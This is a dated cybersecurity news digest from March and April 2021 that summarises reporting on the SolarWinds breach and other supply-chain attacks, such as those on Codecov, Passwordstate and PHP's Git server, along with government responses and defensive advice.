Senators introduce legislation to protect critical infrastructure against attack

Sens. Maggie Hassan (D-N.H.) and Ben Sasse (R-Neb.) on Friday introduced legislation intended to protect critical infrastructure from cyberattacks and other national security threats. The National Risk Management Act would require the CISA to conduct a five-year national risk management cycle.
 
Ref - The Hill 

_______________________________________________________________________________________

(April 23, 2021)


Passwordstate password manager hacked in a supply chain attack

Click Studios, the company behind the Passwordstate enterprise password manager, notified its customers that attackers compromised the app's update mechanism to deliver malware in a supply-chain attack after breaching its networks. Malicious upgrades leading to the supply chain compromise were potentially downloaded by customers between April 20 and April 22.


_______________________________________________________________________________________

(April 23, 2021)


Supply chain attack risk looms over three million mobile app users of CocoaPods

A remote code execution (RCE) vulnerability in the central CocoaPods server could have potentially impacted up to three million mobile apps that relied on the open-source package manager. CocoaPods maintainer Orta Therox likened the potential impact of the flaw to that caused by XcodeGhost, a counterfeit version of macOS development environment Xcode.

Ref - PortSwigger 

_______________________________________________________________________________________

(April 23, 2021)


The new analysis uncovers extensive SolarWinds attack infrastructure

Cybersecurity researchers that have been tracking the infrastructure footprint of SolarWinds threat actors claim the network of servers used in the attack is "significantly larger than previously identified". RiskIQ has identified an additional 18 command and control (C&C) servers that communicated with the malicious payloads that were dropped as part of the cyberattack.

Ref - TechRadar 

_______________________________________________________________________________________

(April 22, 2021)


SUPERNOVA redux, with a portion of masquerading

The SolarWinds attack has a few interesting traits. The first is that the adversary is using residential IP addresses based in the US to make them appear as US-based employees and then leveraging valid accounts to gain access via the VPN. From there, the adversary used a VM and obfuscated PowerShell scripts to move laterally to the SolarWinds server. At this point, the SUPERNOVA webshell is installed. 

Ref - Splunk 

_______________________________________________________________________________________

(April 22, 2021)


CISA identifies Supernova malware during incident response

CISA has revealed that the SolarWinds attackers connected to the entity’s network via a Pulse Secure virtual private network (VPN) appliance, moved laterally to its SolarWinds Orion server, installed malware referred to by security researchers as SUPERNOVA (a .NET webshell), and collected credentials. CISA has released a report providing TTPs observed during an incident response engagement.
Ref - CISA 

_______________________________________________________________________________________

(April 22, 2021)


SolarWinds hack analysis reveals 56% boost in command server footprint

The Sunburst/Solorigate backdoor was designed to identify, avoid, or disable different security products, with a particular focus on circumventing antivirus software developed by FireEye, CrowdStrike, Microsoft, ESET, and F-Secure in the first stage of infection. The second and third stages included custom droppers (Teardrop/Raindrop) and the deployment of additional malware alongside Cobalt Strike. Implants for persistence with components dubbed Goldmax/GoldFinder/Sibot, as well as Sunshuttle, have also been connected to these stages. 

Ref - ZDNet 

_______________________________________________________________________________________

(April 22, 2021)


Software supply chain may get you by exploiting third-party applications

Attacks targeting “zero-days,” or unpatched security bugs, in commonly used third-party applications are another example of the risks from the software supply chain. The recent attacks on the Microsoft Exchange Server are just the latest examples of this type of software supply chain attack. In this case, bugs in Exchange Server allowed attackers to read emails and install a web shell.


_______________________________________________________________________________________

(April 22, 2021)


Supernova threat actors masqueraded as remote workers to access breached network

Members of an APT group, masquerading as teleworking employees with legitimate credentials, accessed a U.S. organization's network and planted a backdoor called Supernova on its SolarWinds Orion server for conducting reconnaissance, domain mapping, and data theft. The attackers had access to the network for nearly one year, from March 2020 to February 2021, before they were discovered and blocked.

Ref - DarkReading 

_______________________________________________________________________________________

(April 21, 2021)


White House shares learnings from the SolarWinds and Microsoft Exchange server cyber incidents

Lessons learned from the recent attacks include 'integrating private sector partners at the executive and tactical levels'. It also includes involving private sector organizations in the response in order to help deliver fixes smoothly, like Microsoft's one-click tool to simplify and accelerate victims' patching and clean-up efforts, as well as sharing relevant information between firms.

Ref - ZDNet 

_______________________________________________________________________________________

(April 20, 2021)


A software supply chain may take you down via vendor compromise

Arguably the most sophisticated of the supply chain attack methods, a Vendor Compromise typically starts with a reconnaissance phase to understand which organizations use the vendor’s software, and other relevant details. Next, the bad actor attempts to gain valid vendor employee credentials via social engineering, phishing, or other more technical means. The malicious operator then attempts to laterally move to the software build environment in order to modify the source code of the application that the vendor provides to its users.


_______________________________________________________________________________________

(April 20, 2021)


The wide web of nation-state hackers attacking the US

Both the SolarWinds supply chain and Microsoft Exchange Server attacks have shown, the targets are no longer limited to federal agencies and the largest companies. Enterprises of all sizes are now at risk, whether it's ransomware or a data breach. In terms of attacks on the U.S., nation-state threat actors typically (but not always) come from the "big four": China, Russia, North Korea, and Iran.

Ref - TechTarget 

_______________________________________________________________________________________

(April 20, 2021)

Codecov supply chain attack has echoes of SolarWinds

To date, Codecov says that it has detected periodic alterations of the Bash uploader script going back as far as 31 January, which ultimately could have allowed whoever was behind the attack to export information stored in its users’ continuous integration (CI) environments. Among Codecov’s larger customers, both HPE and IBM confirmed to Reuters that they were now probing their own systems for signs of intrusion.


_______________________________________________________________________________________

(April 20, 2021)


Hundreds of networks reportedly hacked in Codecov supply-chain attack

In new reporting by Reuters, investigators have stated that hundreds of customer networks have been breached in the incident, expanding the scope of this system breach beyond just Codecov's systems. Codecov had suffered a supply-chain attack that went undetected for over 2-months.


_______________________________________________________________________________________

(April 19, 2021)


White House stands down SolarWinds, Microsoft Exchange cyber response groups

Stepped up patching for the SolarWinds and Microsoft Exchange vulnerabilities has allowed the White House to stand down the two Unified Coordination Groups (UCGs) tasked with tackling the government's response to the cybersecurity threats. They were activated shortly after each incident was discovered.

Ref - GCN 

_______________________________________________________________________________________

(April 19, 2021)


SolarWinds backdoor was downloaded by 1/4th of Electric Utilities - US Utility Regulator

North American Electric Reliability Corp. (NERC), a non-profit regulatory authority that oversees utilities in the United States and Canada, revealed this week that about 25% of the electric utilities on the North American power grid downloaded the SolarWinds backdoor.

Ref - CPO Magazine 

_______________________________________________________________________________________

(April 19, 2021)


Positive Technologies denies involvement in SolarWinds attack

Responding to sanctions imposed by the US government, Russia-headquartered cybersecurity company Positive Technologies (PT) has denied any wrongdoing, and dismissed the claims as “groundless accusation”. Last week, the US Department of the Treasury imposed sanctions on several Russian technology firms, including PT, accusing them of helping Russian state actors to conduct cyberattacks against the West.

Ref - TechRadar 

_______________________________________________________________________________________

(April 19, 2021)


XCSSET malware now targeting Apple's M1-based Macs

A Mac malware campaign targeting Xcode developers has been retooled to add support for Apple's new M1 chips and expand its features to steal confidential information from cryptocurrency apps. XCSSET continues to abuse the development version of the Safari browser to plant JavaScript backdoors to websites via Universal Cross-site Scripting (UXSS) attacks.


_______________________________________________________________________________________

(April 19, 2021)


Codecov hack could be another SolarWinds-type attack

US federal authorities are investigating a security breach suffered by software auditing company Codecov. According to a statement put out by the San Francisco-based firm, an unscrupulous user broke through its digital defenses and modified its Bash Uploader script. While Codecov has emailed all affected users, the nature of the changes to the script potentially puts thousands of customers at risk.

Ref - Techradar

_______________________________________________________________________________________

(April 19, 2021)


Zero-trust is the best defense against third-party attacks

Adopting a zero-trust security strategy can better safeguard organizations against third-party attacks, where suppliers should not simply be entrusted to do the right thing. The Acronis CEO believed third-party attacks such as those involving Accellion and Singapore Airlines (SIA) could have been prevented with a zero-trust architecture. Zero trust isn't just about not trusting anyone, it's about personal cyber hygiene.

Ref - ZDNet

_______________________________________________________________________________________

(April 19, 2021)


Next SolarWinds crisis could happen very soon

The SolarWinds cyber attack, which saw around 100 companies and 9 US federal agencies compromised, isn’t one to be treated as an isolated incident. It is rather a stark warning of what is about to come if decisive action isn’t taken. The vice-president and chief information security officer at Hitachi Vantara discuss how companies can avoid a similar supply-chain crisis.


_______________________________________________________________________________________

(April 17, 2021)


SolarWinds hacking campaign puts Microsoft in the hot seat

Microsoft has offered all federal agencies a year of “advanced” security features at no extra charge. Microsoft also removed names of several Russian IT companies, including Positive Technologies, from a list to whom Microsoft supplied the early access to data on vulnerabilities detected in its products.

Ref - Yahoo 

_______________________________________________________________________________________

(April 17, 2021)


Six out of 11 EU agencies running Solarwinds Orion software were hacked

CERT-EU confirmed that 14 EU agencies were running the SolarWinds Orion monitoring software, and six of them were breached. Anyway, the CERT-EU did not reveal the name of the EU agencies that installed the tainted Orion updates. CERT-EU said that some agencies sent limited details on the attacks, and, while in other reports, network logs, used to hunt for clues about the hackers’ actions, were often not available.


_______________________________________________________________________________________

(April 17, 2021)


Biden upends U.S. convention on cyber espionage

President Biden’s decision to punish Russia for the SolarWinds hack broke with years of U.S. foreign policy that has tolerated cyber espionage as an acceptable form of 21st-century spycraft. It also said U.S. intelligence had “high confidence” that Russia’s foreign intelligence service, the SVR, was behind last year’s SolarWinds hack, which compromised at least nine federal agencies and about 100 private-sector organizations.


_______________________________________________________________________________________

(April 16, 2021)


Commerce Dept. may have found SolarWinds backdoor in Aug. 2020

Last month, Microsoft and FireEye identified that file as a newly-discovered fourth malware backdoor used in the sprawling SolarWinds supply chain hack. FireEye refers to the backdoor as “Sunshuttle,” whereas Microsoft calls it “GoldMax.” A search in VirusTotal’s malware repository shows that on Aug. 13, 2020, someone from the National Telecommunications and Information Administration (NTIA), a division of the U.S. Commerce Department, had
 uploaded a file with that same name and file hashes.


_______________________________________________________________________________________

(April 16, 2021)


More countries officially blame Russia for SolarWinds attack

The United Kingdom, Canada, the European Union, and NATO have expressed support for the United States in blaming Russia for the cyberattack on IT management company SolarWinds, which impacted organizations worldwide. The announcements were made the same day that the United States expelled 10 Russian diplomats and sanctioned dozens of companies and people.


_______________________________________________________________________________________

(April 16, 2021)


The untold story of the SolarWinds hack

Hackers believed to be directed by the Russian intelligence service, the SVR, used the routine software update to slip malicious code into Orion's software and then used it as a vehicle for a massive cyberattack against America. The concern is that the same access that gives the Russians the ability to steal data could also allow them to alter or destroy it.

Ref - NPR 

_______________________________________________________________________________________

(April 15, 2021)


The U.S. imposes sanctions on Russia over cyber-attacks

The US has announced sanctions against Russia in response to what it says are cyber-attacks and other hostile acts. The measures, which target dozens of Russian entities and officials, aiming to deter Russia's harmful foreign activities. The statement says Russian intelligence was behind last year's massive SolarWinds hack and accuses Moscow of interference in the 2020 election.
 
Ref - BBC

_______________________________________________________________________________________

(April 15, 2021)


Codecov Bash Uploader tool compromised in supply chain hack

At the beginning of April, security professionals at Codecov learned that someone had gained unauthorized access to their Bash Uploader script and modified it without permission. The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify the Bash Uploader script.


_______________________________________________________________________________________

(April 15, 2021)


Biden unveiled Russia sanctions over SolarWinds hack 

Ten Russian diplomatic officials are to be expelled from the US and up to 30 entities will be blacklisted in the largest round of sanctions action against Russia of Joe Biden’s presidency. The US is set to announce new sanctions against Russia as soon as Thursday in retaliation for Moscow’s interference in elections, alleged bounties on US soldiers in Afghanistan, and cyber-espionage campaigns such as the SolarWinds hack, according to reports in US and international media.


_______________________________________________________________________________________

(April 14, 2021)


The misuse of X.509 certificates & keys in SolarWinds hack

A report described the misuse of X.509 certificates and keys in the SolarWinds attack and how Cryptomathic CKMS and CSG could help protect against such attacks. While multiple failures led to the attack, one of the most glaring failures was that the attackers could misuse X.509 certificates and keys to forge and undermine trust. 


_______________________________________________________________________________________

(April 14, 2021)


Advanced supply chain attacks need a strategic counter-defense policy

Enterprise CIOs and CISOs in government and the private sector are still assessing the full impact of the advanced supply chain attacks uncovered in recent months. The fact of the matter here is that cyber is where the new wars are being fought and supply chain attacks are a winning playbook for the state-sponsored attackers.


_______________________________________________________________________________________

(April 14, 2021) 


Sunburst hack costs SolarWinds at least $18M

SolarWinds disclosed that it took a hit of at least $18 million from the massive Russian malware attack that compromised its flagship Orion technology management software. In releasing preliminary first-quarter results, SolarWinds said it spent $18 million to $19 million to investigate and remediate the cyber incident, related legal and other professional services, and consulting services provided to customers at no charge.

Ref - CFO

_______________________________________________________________________________________

(April 13, 2021)


A macOS malware is hidden into the NPM package supply chain

A new malicious package has been spotted on the npm registry, which targets NodeJS developers using Linux and Apple macOS operating systems. The malicious package is called "web-browserify," and imitates the popular Browserify npm component downloaded over 160 million times over its lifetime.


_______________________________________________________________________________________
 
(April 13, 2021) 


U.S. intelligence community details growing influence threats in wake of SolarWinds attacks

The intelligence community made its most direct public attribution yet that Russia was behind weaving malicious code into a SolarWinds software update to facilitate a sweeping espionage operation, impacting hundreds of companies and U.S. federal agencies. The readout does not specify whether Biden specifically discussed SolarWinds with his Russian counterpart.

Ref - CyberScoop 

_______________________________________________________________________________________

(April 13, 2021) 


Spy Chiefs to warn of threats from SolarWinds to North Korea

Biden’s intelligence team -- including Director of National Intelligence Avril Haines and CIA Director William Burns -- is under increasing pressure to respond to a widening series of national security threats while defending the administration’s continuing reviews and policy approaches even as it nears the 100-day mark in office.

Ref - Bloomberg

_______________________________________________________________________________________

(April 13, 2021) 


Detecting the next SolarWinds-Style cyberattack

Developing SIEM rules, using the SolarWinds attack as an example, can help in the detection of the next SolarWinds-like attack. Sigma rules can be used as a sort of a common language to create and share quality queries regardless of the SIEM any organization uses. This will enable Security Operations teams to build out the elements needed to detect future attacks. The same Sigma Rule can be used across multiple SIEM, including Splunk, Qradar, and Azure Sentinel.

_______________________________________________________________________________________

(April 12, 2021)


SolarWinds hack underscores the need for moving to the cloud

According to Microsoft CEO Satya Nadella, the SolarWinds attack underscores the importance of implementing zero trust architecture and migrating to the cloud. Nadella sees the SolarWinds hack as a wake-up call for all companies to take security as a first-class priority.

Ref - CRN

_______________________________________________________________________________________

(April 12, 2021)


Biden names former top NSA officials to two key cyber roles

President Biden has appointed former National Security Agency (NSA) deputy director Chris Inglis and former deputy for counterterrorism at the NSA Jen Easterly to two top cyber roles in the administration. The appointments come as the White House is still dealing with the fallout over the SolarWinds cyber attack, which infiltrated multiple federal agencies.

Ref - Axios
 
_______________________________________________________________________________________

(April 10, 2021)


APKPure users targeted via a supply chain attack

APKPure, one of the largest alternative app stores, was the victim of a supply chain attack, threat actors compromised client version 3.17.18 to deliver malware. The app store is available only on devices that use Google Mobile Services (GMS) and are firmly tied to Google’s infrastructure. The tainted client downloads and installs various apps, including other malicious payloads.


_______________________________________________________________________________________

(April 9, 2021)


Stopping or preventing the next SolarWinds breach 

Mitigating the next SolarWinds breach will require more cyber-savvy people to assess and recognize those threats, explain their potential impact and advocate for enterprise-wide investment in the appropriate levels of protection. Additionally, it will require more boots on the ground in a field that has evolved to encompass a growing array of sub-areas and rapidly changing technologies.


_______________________________________________________________________________________

(April 9, 2021)


Gigaset devices laced with malware in a latest supply chain attack 

Cybercriminals managed to sneak several malicious apps onto Gigaset Android devices by compromising a server belonging to an external update service provider. The models affected, according to Malwarebytes, including the Gigaset GS270 and GS160, Siemens GS270 and GS160, all running Android 8, as well as the Alps P40pro, running Android 9, and S20 pro+, running Android 10.

Ref - IT Pro

_______________________________________________________________________________________

(April 9, 2021)


Supply chain disruptions lead to the loss of trillions of dollars

Supply chain disruptions in 2020 had a real impact on the bottom line, as companies lost trillions of dollars in revenue, according to the report, with 64% of respondents reporting revenue losses between 6% and 20%. The recent survey indicated that the disruptions caused a big hit in brand reputation, with 38% of respondents reporting that their brands had been impacted. Many respondents said that their struggles to maintain supplies of goods and services left customers frustrated.


_______________________________________________________________________________________

(April 9, 2021)


What the Titans of Industry Reveal about SolarWinds Attack

During the testimony, it was outlined how the SolarWinds software was hijacked and used to break into a host of other organizations, and that the hackers had been able to read Microsoft’s source code for user authentication. Unfortunately for Microsoft, and strongly pointed out by CrowdStrike, the data hackers took advantage of well-known vulnerabilities in their Windows authentication and active directory federation services.


 _______________________________________________________________________________________

(April 9, 2021)


How to protect against software supply-chain attacks

Organizations can protect themselves against supply-chain attacks with some simple tips. They should avoid the use of third-party modules, watch for threats when using modules by unknown authors, and perform automated scans of code submitted in repositories. They can also Have a plan for external services and develop an on-premises and cloud strategy.

Ref - SCMagazine 

_______________________________________________________________________________________

(April 8, 2021)


CISA releases tool to review Microsoft 365 post-compromise activity

CISA has released a new tool, dubbed Aviary, that can help security teams visualize and analyze data outputs generated using Sparrow, an open-source PowerShell-based tool for detecting potentially compromised applications and accounts in Azure and Microsoft 365. Sparrow was created to help defenders hunt down threat activity after the SolarWinds supply-chain attack.


_______________________________________________________________________________________

(April 8, 2021)


How to minimize cyberattacks on supply and value chains

Organizations can mitigate access-related third-party risk in several ways. This includes providing an identity to anything connecting to the enterprise, including people, systems, and things. Another way is taking advantage of identity broker technology to verify credentials and enrich authentication requirements. Accessing governance for third-party identities and centrally managing all third-party access can also help minimize the risks.


_______________________________________________________________________________________

(April 8, 2021)


Biden administration sets the stage for retaliation against Russia over SolarWinds attack

The Biden administration completed an intelligence review of alleged Russian meddling in the SolarWinds cybersecurity attack and interference in US elections. The review could set the stage for possible retaliatory actions like enacting sanctions or expulsion of Russian intel officers in the US.

Ref - Yahoo 

_______________________________________________________________________________________

(April 7, 2021)


In another supply chain incident, Gigaset injects malware into victims' phones

Android smartphones from Gigaset have been infected by malware directly from the manufacturer in what appears to be a supply-chain attack. The Trojan, once downloaded and installed on a victim's device via a poisoned software update from the vendor, is capable of opening browser windows, fetching more malicious apps, and sending people text messages to further spread the malware.

Ref - The Register 

_______________________________________________________________________________________

(April 7, 2021)


Supply?chain attacks - When trust goes wrong

Minimizing the risk of a supply-chain attack involves a never-ending loop of risk and compliance management. In the SolarWinds hack, the post-attack in-depth inspection of the third-party vendor’s product identified the exploit buried deep in the code. As a preventive measure, organizations need to have visibility into all of their suppliers and the components they deliver, which includes the policies and procedures that the company has in place.


_______________________________________________________________________________________

(April 6, 2021)


Senators press for more on SolarWinds hack after AP report

Key lawmakers said they're concerned they've been kept in the dark about what suspected Russian hackers stole from the federal government and they pressed Biden administration officials for more details about the scope of what's known as the SolarWinds hack.


 _______________________________________________________________________________________

(April 6, 2021)


RSA Conference 2021 will have a keynote from SolarWinds’s president

RSA Conference announced that Sudhakar Ramakrishna, President of SolarWinds, has joined the keynote line-up for RSA Conference 2021. He will be joined by Laura Koetzle to explore the technical elements of the breach and will provide a deep understanding of the sophistication of the overall operation of the nation-state attack.


_______________________________________________________________________________________

(April 5, 2021)


SolarWinds type attacks need a serious approach toward cybersecurity 

The federal government has to take cybersecurity more seriously, both from a funding and a legislation standpoint after the SolarWinds breach. There is some hope that this will happen with the new administration, but it remains to be seen if talk will turn into action and real change. Only with a concerted effort across all levels of government, big to small, national/state to local, will we be able to overcome this cyber assault and keep our citizens safe and secure.

Ref - GovTech

_______________________________________________________________________________________

(April 5, 2021)


The cybersecurity warning system in the U.S.

Many vulnerabilities and threats aren’t discovered by the government but are regularly uncovered by hackers who find bugs, notify companies, and often work with them to develop fixes. In turn, CISA can immediately issue directives, as it did during SolarWinds and the Microsoft Exchange compromise, that mandate action for federal agencies and sound the clarion call for others to heed.


_______________________________________________________________________________________

(April 2, 2021)


The importance of supply chain risk management

With cloud and digital technology allowing companies to flourish and succeed globally, the world has never been more interconnected. However, this comes with elevated risk. Partners, vendors, and third parties can expose companies and malicious hackers are known to target organizations through their supply chain. As a result, supply chain risk management has become a critical component of any company’s risk management and cybersecurity strategy.

Ref - Varonis

_______________________________________________________________________________________

(April 2, 2021)


The positive outcome from the SolarWinds breach

The SolarWinds compromise may have some positive outcomes by shining an even harsher light on the complacency that still exists when it comes to security. It is important especially for the different security standards that are applied to development/supplier systems compared to in-house production systems. Now, securing the supply chain has become a hot topic, and organizations can do better to protect their infrastructure.

Ref - BMC

_______________________________________________________________________________________

(April 2, 2021)


How Russian hackers targeted US cyber first responders in SolarWinds breach

After infiltrating US government computer networks early last year as part of the SolarWinds data breach, Russian hackers then turned their attention to the very people whose job was to track them down. The hackers identified a handful of key cybersecurity officials and analysts who would be among the first to respond once the hack was detected, so-called 'threat hunters,' and attempted to access their email accounts.

Ref - CNN 

_______________________________________________________________________________________

(April 1, 2021)


After the hack, officials draw attention to supply chain threats

The National Counterintelligence and Security Center warned that foreign hackers are increasingly targeting vendors and suppliers that work with the government to compromise their products in an effort to steal intellectual property and carry out espionage. The NCSC said it is working with other agencies, including the CISA to raise awareness of the supply chain issue.
Ref - AP News 

_______________________________________________________________________________________

(April 1, 2021)


Learnings from the SolarWinds supply chain attack

The recent SolarWinds attack (known as Sunburst) has shone a light on the controls required after a breach, with affected organizations laser-focused on what happened and what next. But the same controls that can help remediate the risks posed by this serious supply chain threat can also help prevent or limit the effect of this and other attacks before they happen.

Ref - Accenture

_______________________________________________________________________________________

(April 1, 2021)


The U.S. officials are drawing attention to the supply chain attacks

The U.S. government is working to draw attention to supply chain vulnerabilities, an issue that received particular attention late last year after suspected Russian hackers gained access to federal agencies and private corporations by sneaking malicious code into widely used software. The NCSC said it plans to issue guidance throughout the month about how specific sectors, like health care and energy, can protect themselves.


_______________________________________________________________________________________

(April 1, 2021)


The SolarWinds hack severity perception increased over time

(ISC)² has published the results of an online survey of 303 cybersecurity professionals on the SolarWinds Orion software breach. In which, 86% of respondents rated the breach “very” or “extremely severe” when they first learned about it. However, roughly six weeks after the incident was reported, as more details emerged, the number of respondents who indicated that the breach was “severe” increased from 51% to 55%.


_______________________________________________________________________________________

(April 1, 2021)


A report with detailed analysis of SolarWinds hacking tools

US Cyber Command and the Department of Homeland Security (DHS) are preparing to release a detailed analysis of the hacking tools used in the SolarWinds attack, which targeted multiple federal agencies and private firms last year. The report was originally scheduled to be released on Wednesday, but the DHS delayed it without explanation. However, it's still expected to be published soon.

Ref - Computing

_______________________________________________________________________________________

(April 1, 2021)


DHS chief announces cybersecurity plan in wake of SolarWinds attacks

Homeland Security Secretary Alejandro Mayorkas warned that cyber threats are coming dangerously close to threatening people’s lives as he announced a series of sprints designed to counter online attacks. The series includes 60-day sprints, each focused on the most important and most urgent priorities needed to achieve goals.

Ref - Yahoo

_______________________________________________________________________________________

(March 31, 2021)


The SolarWinds breach is a wake-up call for the security community

The next time a SolarWinds-class attack occurs, the steps toward a successful response are already defined. As it includes, understanding potential concentration risks may involve delving into third-party liabilities and obligations, or categorizing vendors, and understanding the scope of the larger supplier ecosystem. By defining potential sources of this risk, it becomes possible to build mitigation strategies into incident response plans. 

Ref - Deloitte

_______________________________________________________________________________________

(March 30, 2021)


Executive order with 'a dozen' actions forthcoming after SolarWinds, Microsoft breaches

The Biden administration is working on “close to a dozen” action items to be included in an upcoming executive order meant to strengthen federal cybersecurity in the wake of two major breaches. The comments were made as the Biden administration continues to grapple with the fallout from both the recent attacks.

Ref - TheHill 

_______________________________________________________________________________________

(March 30, 2021)


Infosec community is concerned about SolarWinds hack

The severity of a data breach typically jumps in the short term and decreases as time progresses. But, according to a survey by International Information System Security Certification Consortium, or (ISC)2, the 2020 SolarWinds incident bucked that trend in the eyes of cybersecurity professionals. A month and a half after the incident was reported, the number of respondents who indicated the breach was “severe” increased from 51% to 55%.


_______________________________________________________________________________________

(March 30, 2021)


Details about the second elusive attack targeting SolarWinds software

Details about the scope and victims of Supernova, which exploited a flaw in SolarWinds' Orion network management software, so far have been scarce. Less than a handful of victims have been known to be targeted, and an investigation into the breach of one of those victims led to researchers at Secureworks tying the Supernova attacks to a previously unknown Chinese nation-state group they dubbed "Spiral."


_______________________________________________________________________________________

(March 30, 2021)


SolarWinds breach lead to distrust of software in use 

Security experts say because enterprises can't inspect the inner workings of the software they buy, they're at the mercy of software companies' security practices. In SolarWind attacks, attackers infected the software that is trusted by organizations. And that software became a way to steal confidential information. This breach of trust of software is huge because software is driving everything around tech firms.


_______________________________________________________________________________________

(March 30, 2021)


Trump administration emails were compromised in SolarWinds breach

An Associated Press report found that the head of DHS and the department's cyber-security staff were among the accounts exposed during the SolarWinds hack. Email accounts belonging to members of the Trump administration's Department of Homeland Security, including the head of the department, were reportedly compromised by suspected Russian hackers, according to the report.

Ref - Yahoo

_______________________________________________________________________________________

(March 29, 2021)


Key lessons from Sunburst

The cyber domain is a realm of intense interconnectivity that underpins much of daily life and national security. The discovery late in 2020 that Sunburst malware had infected not only thousands of private networks but also US government agencies, led some spectators to embrace alarmist views of this event as the first step in a full-fledged cyberwar.


_______________________________________________________________________________________

(March 29, 2021)


PHP's Git server hacked in a recent supply chain attack

In the latest software supply chain attack, the official PHP Git repository was hacked and the code base tampered with. Two malicious commits were pushed to the php-src Git repository maintained by the PHP team on their git.php.net server. The threat actors had signed off on these commits as if these were made by known PHP developers and maintainers, Rasmus Lerdorf and Nikita Popov.


_______________________________________________________________________________________

(March 29, 2021)


SolarWinds breach got emails of top DHS officials

Suspected Russian hackers gained access to email accounts belonging to the Trump administration’s head of the Department of Homeland Security and members of the department’s cybersecurity staff whose jobs included hunting threats from foreign countries. The intelligence value of the hacking of then-acting Secretary Chad Wolf and his staff are not publicly known.

Ref - AP News

_______________________________________________________________________________________

(March 29, 2021)


Need of a new alert system for cybersecurity

America needs a national cyber vulnerability early warning center after the recent SolarWinds breach. Just as a meteorologist is constantly on the lookout for storm systems, an early warning center would search widely used software and hardware components for vulnerabilities. It would discover new weaknesses before opponents, fortifying defenses and increasing the costs of mounting an attack.


_______________________________________________________________________________________

(March 29, 2021)


SolarWinds patches four new vulnerabilities in the Orion platform

SolarWinds released fixes for four new vulnerabilities in their Orion platform, the most severe of which is an authenticated remote code execution flaw due to a JSON deserialization weakness. Fixes for these weaknesses are in Orion Platform 2020.2.5.

Ref - Rapid7 

_______________________________________________________________________________________

(March 26, 2021)


SolarWinds hackers copied a limited number of source code repositories - Mimecast

A forensic investigation conducted by Mimecast and FireEye Mandiant incident response division found that SolarWinds hackers downloaded a limited number of the company’s source code repositories.

Ref - CPO Magazine 

_______________________________________________________________________________________

(March 26, 2021)


Software security is the top priority - SolarWinds CEO

SolarWinds has launched a Secure by Design initiative in response to the recent cybersecurity attack. This project is designed to build security into the design phase of software development and to make security an ongoing priority instead of an after-the-fact priority. The company is testing a design process that uses several parallel build chains simultaneously to create software instead of just one. 

Ref - TechRepublic 

_______________________________________________________________________________________

(March 26, 2021)


Lessons learned from the SolarWinds breach

A system like SolarWinds should have security checks built in from the start and the use of software signing keys should always be closely monitored. In addition, organizations need to adopt a zero-trust policy, stay vigilant, and create a security culture to prevent complex attacks like this.

Ref - Forbes

_______________________________________________________________________________________

(March 25, 2021)


Strategies to guard against email fraud in supply chain

Proofpoint has provided six recommendations to protect supply chain relationships: knowing who the suppliers are, considering the "spider web," creating more vendor accountability, being responsive to security-conscious users, relying more on automation, and finally implementing DMARC at the gateway.


_______________________________________________________________________________________

(March 25, 2021)


SolarWinds breach - Key learnings

Security experts identified several critical learnings from SolarWinds breach: Threat hunting and threat intelligence built on artificial intelligence and machine learning; Comprehensive detection with real-time continuous monitoring; Simplified incident response infrastructure that is capable of detecting attacks, containing the damage, and restoring systems and data; Agile, integrated, and automated security technology; Dynamic remediation strategies designed to quickly return business operations to a trusted state

Ref - OpenText

_______________________________________________________________________________________

(March 25, 2021)


Fed breach disclosure rule after SolarWinds breach

An executive order in the wake of the SolarWinds hack will require software vendors and service providers to notify their U.S. government clients if they experience a security breach. Major software companies like Microsoft and Salesforce that sell to the government would be affected by the executive order.

Ref - CRN

_______________________________________________________________________________________

(March 25, 2021)


Fresh code execution flaws in the Solarwinds Orion platform

Solarwinds has shipped a major security update to fix at least four documented security vulnerabilities, including a pair of bugs that are exploited for remote code execution attacks. The patches were pushed out as part of a minor security makeover of the Orion Platform, the same compromised Solarwinds product that was exploited in recent nation-state software supply chain attacks.


_______________________________________________________________________________________

(March 25, 2021)


SolarWinds making changes in the build process after the hack

SolarWinds’ chief executive said the software provider made a series of changes to its build process and board room reporting structure in an effort to prevent another supply chain attack like the one experienced by the company. The company is also taking a series of actions designed to boost the profile of cybersecurity in business decisions and increase the autonomy of its chief information security officer and CIO shops.

Ref - SC Media

_______________________________________________________________________________________

(March 25, 2021)


Some powerful tactics to prevent supply chain attacks

Upguard recommends some defense tactics that organizations can implement to significantly decrease the chances of a supply chain attack. This includes implementing Honeytokens, securing privileged access management, implementing a Zero-Trust architecture, and assuming a breach mindset when preparing the security strategy.

Ref - Upguard 

_______________________________________________________________________________________

(March 25, 2021)


‘Trust no one’ becomes cyber mantra after massive hacking attacks

In the wake of two massive cyberattacks that exposed glaring deficiencies in U.S. defenses, government officials and cybersecurity practitioners are saying zero-trust may be the way to stop the cyber mayhem. Zero-trust reduces or prevents lateral movement and privilege escalation.

Ref - JapanTimes 

_______________________________________________________________________________________

(March 24, 2021)


Securing the software development build using secure design

SolarWinds SVP, Engineering Lee McClendon, KPMG Director of Cyber Security Services Caleb Queern, and Head Geek Thomas LaRock provide insights on how SolarWinds is prioritizing security in its software build environment, and what the entire industry can learn about next-generation software development.

Ref - SolarWinds 

_______________________________________________________________________________________

(March 24, 2021)


SolarWinds attack and other threats indicate increased nation-state activity

Cyber attacks launched by nation-states are becoming more proficient and aggressive. This was the message from Admiral (ret.) Michael S. Rogers at the NetDiligence Cyber War Webinar Series. He said that the breadth of activity has now changed with the SolarWinds attack in December 2020 and the attack on Microsoft Exchange this month, both arguable evidence of increased nation-state activity.

Ref - Yahoo

_______________________________________________________________________________________

(March 23, 2021)


Attackers can abuse OAuth authentication apps used in the SolarWinds breach

Given the broad permissions they can have to your core cloud applications, OAuth apps have become a growing attack surface and vector. Attackers use various methods to abuse OAuth apps, including compromising app certificates, which was also used in the SolarWinds / Solorigate campaign. Attackers can use OAuth access to compromise and take over cloud accounts. Until the OAuth token is explicitly revoked, the attacker has persistent access to the user’s account and data. 


_______________________________________________________________________________________

(March 23, 2021)


SolarWinds breach is one of the most challenging hacking incidents

The recent SolarWinds Senate hearing and a flurry of subsequent briefings have unearthed new questions around the attack. The acting director of the U.S. Cybersecurity and Infrastructure Agency (CISA) Brandon Wales has called it the most complex and challenging hacking incident the agency has come up against.

Ref - CyberArk

_______________________________________________________________________________________

(March 23, 2021)


Microsoft proposes incentivizing digital solutions to mitigate supply chain risk

The first step in strengthening supply chain security is to carefully identify the risks. Once those risks are identified, the industry can then work with the government to define risk-mitigating best practices and tailored technology-enabled solutions. Technology may not eliminate the need for more traditional restrictive measures in all contexts. But in many areas, technology-enabled solutions can both strengthen security and sustain tech leadership.

Ref - Microsoft  

